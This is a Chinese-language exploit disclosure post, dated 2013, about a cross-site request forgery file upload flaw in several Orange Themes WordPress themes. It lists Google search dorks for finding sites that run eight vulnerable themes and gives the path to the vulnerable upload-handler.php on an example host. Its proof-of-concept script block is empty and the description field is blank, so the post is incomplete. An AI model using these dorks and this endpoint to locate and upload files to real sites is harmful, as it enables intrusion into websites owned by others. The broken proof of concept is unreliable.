WordPress的橙色主题跨站请求伪造文件上传漏洞

  • A+
所属分类:漏洞时代
摘要

发布日期:2013-11.3
发布作者:JJE Incovers漏洞类型:文件上传漏洞描述:利用方法
[php]
inurl:”/wp-content/themes/agritourismo-theme/”
inurl:”/wp-content/themes/bordeaux-theme/”
inurl:”/wp-content/themes/bulteno-theme/”
inurl:”/wp-content/themes/oxygen-theme/”
inurl:”/wp-content/themes/radial-theme/”
inurl:”/wp-content/themes/rayoflight-theme/”
inurl:”/wp-content/themes/reganto-theme/”
inurl:”/wp-content/themes/rockstar-theme/”
[/php]
跨站请求伪造文件上传漏洞利用及POC

发布日期:2013-11.3
发布作者:JJE Incovers

漏洞类型:文件上传

漏洞描述:

利用方法
[php]
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
[/php]
跨站请求伪造文件上传漏洞利用及POC

http://0day5.com/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :
[php]

Your File:

[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: